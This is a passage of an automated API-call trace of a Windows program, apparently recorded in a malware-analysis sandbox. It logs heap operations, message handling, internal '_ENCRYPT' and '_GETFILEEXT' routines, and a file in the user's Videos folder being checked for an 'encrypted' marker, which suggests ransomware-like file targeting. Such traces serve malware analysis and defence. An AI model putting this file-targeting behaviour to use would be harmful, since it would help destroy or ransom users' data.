hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.320] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.320] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.320] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0042.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.321] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.322] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 1 [0042.322] TranslateMessage (lpMsg=0x6aedfc) returned 0 [0042.322] DispatchMessageW (lpMsg=0x6aedfc) returned 0x0 [0042.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.322] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.322] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae498) returned 1 [0042.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.323] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0042.323] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0042.323] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0042.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.323] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0042.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.323] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.324] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.324] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.325] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0042.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ca30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.325] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0042.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.325] CloseHandle (hObject=0x128) returned 1 [0042.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0042.325] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.325] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.326] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.326] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.326] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.326] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.326] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.326] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.327] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.327] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.327] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cd467f0, ftCreationTime.dwHighDateTime=0x1d5bbff, ftLastAccessTime.dwLowDateTime=0xabbcf130, ftLastAccessTime.dwHighDateTime=0x1d5b818, ftLastWriteTime.dwLowDateTime=0xabbcf130, ftLastWriteTime.dwHighDateTime=0x1d5b818, nFileSizeHigh=0x0, nFileSizeLow=0x1340, dwReserved0=0x0, dwReserved1=0x777648, cFileName="E- koDk.mkv", cAlternateFileName="E-KODK~1.MKV")) returned 0x7c20c0 [0042.327] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.327] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cd467f0, ftCreationTime.dwHighDateTime=0x1d5bbff, ftLastAccessTime.dwLowDateTime=0xabbcf130, ftLastAccessTime.dwHighDateTime=0x1d5b818, ftLastWriteTime.dwLowDateTime=0xabbcf130, ftLastWriteTime.dwHighDateTime=0x1d5b818, nFileSizeHigh=0x0, nFileSizeLow=0x1340, dwReserved0=0x0, dwReserved1=0x777648, cFileName="E- koDk.mkv", cAlternateFileName="E-KODK~1.MKV")) returned 0x7c20c0 [0042.327] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.327] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.327] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\sKe8ZL\\E- 